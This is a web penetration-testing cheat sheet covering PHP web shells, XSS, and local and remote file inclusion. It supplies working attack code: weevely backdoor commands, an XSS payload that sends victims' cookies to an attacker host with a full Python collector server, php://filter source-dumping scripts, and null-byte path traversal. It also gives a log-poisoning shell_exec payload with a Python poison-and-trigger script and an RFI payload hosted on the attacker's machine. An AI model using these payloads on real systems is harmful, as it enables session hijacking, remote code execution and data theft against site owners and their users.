Title: Web Attacks techniques used and required in Penetration Testing
Author: unknowndevice64

WebShag - Web Application Vulnerability Assessment Platform

Web Shells
ls -l /usr/share/webshells/

Generate a PHP backdoor (generate) protected with the given password (s3cr3t), upload the resulting file to the target web root, then connect to it with the same password
weevely generate s3cr3t weevely.php
weevely http://$ip/weevely.php s3cr3t

Java Signed Applet Attack

HTTP / HTTPS Webserver Enumeration

OWASP Dirbuster

nikto -h $ip

Essential Iceweasel Add-ons
Cookies Manager https://addons.mozilla.org/en-US/firefox/addon/cookies-manager-plus/
Tamper Data

Cross Site Scripting (XSS)
XSS can have significant impacts, such as cookie stealing and authentication bypass (hijacking the victim's session), redirecting the victim's browser to a malicious HTML page, and more.

Browser Redirection and IFRAME Injection

A zero-sized iframe makes the victim's browser fetch the attacker's page without anything visible on screen:
<iframe src="http://$ip/report" height="0" width="0"></iframe>

Stealing Cookies and Session Information

new Image().src="http://$ip/bogus.php?output="+document.cookie;

The browser requests the "image" from the attacking host, so the cookie arrives in the request line; catch it with a listener (cookies set with the HttpOnly flag are not exposed to document.cookie and will be missing):
nc -nlvp 80
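As an added example (not code from the original page), the following Python collector plays the role of nc -nlvp 80 above and parses what the injected new Image() payload sends: the path /bogus.php and the parameter name output come from that payload, while the port and everything else are assumptions of this example.

```python
import http.server
import urllib.parse

# Added example (not code from the original page): a small collector that plays the role
# of "nc -nlvp 80" and parses what the injected payload
#   new Image().src="http://$ip/bogus.php?output="+document.cookie;
# sends. The path /bogus.php and the parameter name "output" come from that payload;
# the port and everything else here are assumptions of this example.


def extract_cookies(request_target):
    """Return {name: value} for the cookies in a request target such as
    '/bogus.php?output=PHPSESSID=abc123;%20role=admin'.

    document.cookie is 'name=value; name2=value2', and the browser only
    percent-encodes the spaces when it builds the image URL, so the value of
    "output" itself still contains '=' and ';'. Take everything after the first
    '=' of the output pair instead of relying on a generic query parser,
    unquote it, then split on ';'."""
    query = urllib.parse.urlsplit(request_target).query
    cookies = {}
    for pair in query.split("&"):
        name, _, value = pair.partition("=")
        if name != "output":
            continue
        for chunk in urllib.parse.unquote(value).split(";"):
            chunk = chunk.strip()
            if chunk:
                cname, _, cvalue = chunk.partition("=")
                cookies[cname.strip()] = cvalue
    return cookies


class CollectorHandler(http.server.BaseHTTPRequestHandler):
    """Logs stolen cookies and answers 204 so nothing visible happens in the victim's browser."""

    def do_GET(self):
        stolen = extract_cookies(self.path)
        if stolen:
            print(f"[+] {self.client_address[0]} -> {stolen}")
        self.send_response(204)
        self.end_headers()

    def log_message(self, fmt, *args):
        pass  # suppress the default access log; only stolen cookies are printed


def serve(port=80):
    """Bind the collector (port 80 needs root; any port the payload points at will do)."""
    http.server.HTTPServer(("0.0.0.0", port), CollectorHandler).serve_forever()


if __name__ == "__main__":
    serve()
```

Run it as root (or change the port in both the payload and serve()), then trigger the XSS; each hit prints the victim's address and its cookies as a dictionary, ready to be replayed in Cookies Manager.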

File Inclusion Vulnerabilities

Local (LFI) and remote (RFI) file inclusion vulnerabilities are commonly found in poorly written PHP code.

fimap - a Python tool that automates finding and exploiting LFI/RFI vulnerabilities in PHP applications (think sqlmap, but for file inclusion):
Gaining a shell from phpinfo()
fimap + phpinfo() exploit - If a phpinfo() page is present it is usually possible to get a shell: phpinfo() discloses the temporary name of a file uploaded in the same request, and that temporary file can be included through the LFI before PHP removes it. If you don't know the location of the phpinfo page, fimap can probe for it, or you could use a tool like OWASP DirBuster.

For Local File Inclusions look for include(), include_once(), require() and require_once() calls in the PHP code whose path is built from user input (e.g. a GET parameter).


LFI - Read PHP source through the php://filter wrapper (base64-encode the file so include() returns its source instead of executing it, then decode it locally)

curl -s \
"http://$ip/?page=php://filter/convert.base64-encode/resource=index" \
| grep -o -e '[^ ]\{40,\}' | base64 -d

(resource=index has no extension because the vulnerable include() appends .php itself; the grep keeps only the long base64 run and drops the surrounding HTML)
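The same php://filter trick in Python, as an added example that is not code from the original page: it builds the filter URL, pulls the base64 run out of the page (the job of the grep above) and decodes it to the PHP source. The parameter name page, the host and the sample response body are assumptions constructed for this example.

```python
import base64
import re
import urllib.parse
import urllib.request

# Added example, not code from the original page. php://filter/convert.base64-encode
# wraps the file before include() sees it, so the server returns the base64-encoded
# source instead of executing the PHP. Parameter name "page", the host and the sample
# response below are assumptions of this example.

# >= 40 base64 characters with optional padding, the Python twin of grep '[^ ]\{40,\}'
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def filter_url(base_url, param, resource):
    """Build the LFI URL asking PHP to base64-encode `resource` instead of including it.
    `resource` is given without .php when the vulnerable include() appends the extension."""
    value = f"php://filter/convert.base64-encode/resource={resource}"
    return f"{base_url}?{urllib.parse.urlencode({param: value}, safe=':/=')}"


def extract_source(html):
    """Decode the longest base64 run found in the response body to the PHP source.
    Returns None when no blob is present (parameter not vulnerable, or filter blocked)."""
    runs = B64_RUN.findall(html)
    if not runs:
        return None
    blob = max(runs, key=len)
    blob += "=" * (-len(blob) % 4)  # restore padding the page template may have eaten
    try:
        return base64.b64decode(blob, validate=True).decode("utf-8", errors="replace")
    except ValueError:  # binascii.Error is a ValueError
        return None


def dump_source(base_url, param, resource):
    """Live version (uses the network): fetch the page and decode the source."""
    with urllib.request.urlopen(filter_url(base_url, param, resource), timeout=10) as resp:
        return extract_source(resp.read().decode("utf-8", errors="replace"))


# Constructed sample: the vulnerable index.php and a response in which its base64 blob
# sits where the included file's output would normally be rendered.
VULNERABLE_INDEX = "<?php\n$page = $_GET['page'];\ninclude($page . '.php');\n?>\n"
SAMPLE_RESPONSE = (
    "<html><body><div id=menu>Home | About</div>\n"
    + base64.b64encode(VULNERABLE_INDEX.encode()).decode()
    + "\n<div id=footer>footer</div></body></html>"
)

if __name__ == "__main__":
    print(filter_url("http://10.10.10.10/index.php", "page", "index"))
    print(extract_source(SAMPLE_RESPONSE))
```

Reading index.php this way usually reveals the include() line itself, which tells you whether an extension is appended (and therefore whether a null byte or other truncation trick is needed for the next step).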

LFI - Download file with base64 encoding

LFI Linux Files:

LFI Windows Files:

LFI OSX Files:

LFI - Download passwords file

LFI - Download passwords file with filter evasion

Local File Inclusion - In PHP versions before 5.3.4 (with magic_quotes_gpc off) a null byte (%00) terminates the path, so the extension the application appends (e.g. ".php") is dropped and the traversed file is included as-is
GET /addguestbook.php?name=Haxor&comment=Merci!&LANG=../../../../../../../windows/system32/drivers/etc/hosts%00

Contaminating Log Files - send this PHP payload in a field the web server writes to its log (e.g. the User-Agent header), then include the log file through the LFI and pass the command in the cmd parameter:
<?php echo shell_exec($_GET['cmd']);?>
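As an added example (not code from the original page), the block below packages the two LFI tricks above: the %00 terminator for PHP before 5.3.4, shown by a small model of what the vulnerable include($_GET['LANG'] . '.php') ends up opening, and log poisoning as a two-request procedure (payload in the User-Agent, then inclusion of the access log with cmd). Parameter names, the log path, hosts and the version threshold behaviour modelled in simulate_php_include are assumptions of this example; only the PHP payload is the page's own.

```python
import urllib.error
import urllib.parse
import urllib.request

# Added example, not code from the original page. Parameter names, paths and hosts are
# assumptions; PHP_PAYLOAD is the log-poisoning payload given on the page.

PHP_PAYLOAD = "<?php echo shell_exec($_GET['cmd']);?>"


def traversal(target, depth=8, sep="/"):
    """'../' * depth + target. Extra ../ are harmless once the filesystem root is reached,
    so overshooting is the safe default."""
    return (".." + sep) * depth + target.lstrip("/\\")


def lfi_value(target, depth=8, null_byte=False):
    """Value for the vulnerable parameter. null_byte=True appends %00 to drop the extension
    the application concatenates (only works on PHP < 5.3.4 with magic_quotes_gpc off)."""
    value = traversal(target, depth)
    return value + "%00" if null_byte else value


def simulate_php_include(raw_param, suffix=".php", php_version=(5, 2, 17)):
    """Model (assumption of this example, not PHP itself) of what
    include($_GET['LANG'] . '.php') opens: old PHP handed the string to C fopen(), which
    stops at the first NUL byte; 5.3.4+ rejects paths containing NUL (returns None here)."""
    path = urllib.parse.unquote(raw_param) + suffix
    if "\x00" not in path:
        return path
    if php_version < (5, 3, 4):
        return path.split("\x00", 1)[0]
    return None


def poison_headers():
    """First request: the payload rides in User-Agent, which Apache writes verbatim into
    access.log (combined format). The response status is irrelevant; the log line is."""
    return {"User-Agent": PHP_PAYLOAD}


def trigger_url(base_url, param, log_path, cmd, depth=8, null_byte=False):
    """Second request: include the poisoned log through the LFI and pass the command in cmd.
    PHP executes every <?php ... ?> block it finds in the log, including ours."""
    query = urllib.parse.urlencode(
        {param: lfi_value(log_path, depth, null_byte), "cmd": cmd}, safe="/%"
    )
    return f"{base_url}?{query}"


def poison_and_trigger(base_url, param, log_path, cmd, null_byte=False):
    """Live version (uses the network): poison, then trigger and return the page body."""
    req = urllib.request.Request(base_url, headers=poison_headers())
    try:
        urllib.request.urlopen(req, timeout=10).read()
    except urllib.error.HTTPError:
        pass  # a 4xx/5xx still gets logged, which is all we need
    url = trigger_url(base_url, param, log_path, cmd, null_byte=null_byte)
    with urllib.request.urlopen(url, timeout=10) as resp:
        return resp.read().decode("utf-8", errors="replace")


if __name__ == "__main__":
    print(simulate_php_include("../../../etc/passwd%00"))            # old PHP: ../../../etc/passwd
    print(simulate_php_include("../../../etc/passwd%00", php_version=(5, 6, 0)))  # None: blocked
    print(trigger_url("http://10.10.10.10/index.php", "page", "/var/log/apache2/access.log", "id"))
```

Two practical caveats: poison the log only once (every later include re-executes every payload line in it, and a log full of PHP errors is noisy), and if the log is not readable by the web server user try other files the server writes with attacker-controlled content, such as the SSH auth log via a username, before giving up on the technique.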

For a Remote File Inclusion look for user input that is passed unsanitized to the PHP include function; additionally php.ini must be configured to allow remote files

/etc/php5/cgi/php.ini - "allow_url_fopen" and "allow_url_include" both set to "On" (allow_url_include is Off by default, so RFI requires a deliberately weakened configuration)


Remote File Inclusion

Host the payload on the attacking machine (as a .txt file so the attacker's own web server does not execute it) and point the vulnerable parameter at it, e.g. ?page=http://$ip/evil.txt:

<?php echo shell_exec("ipconfig");?>

Submitted On: 2019-05-18 12:18:25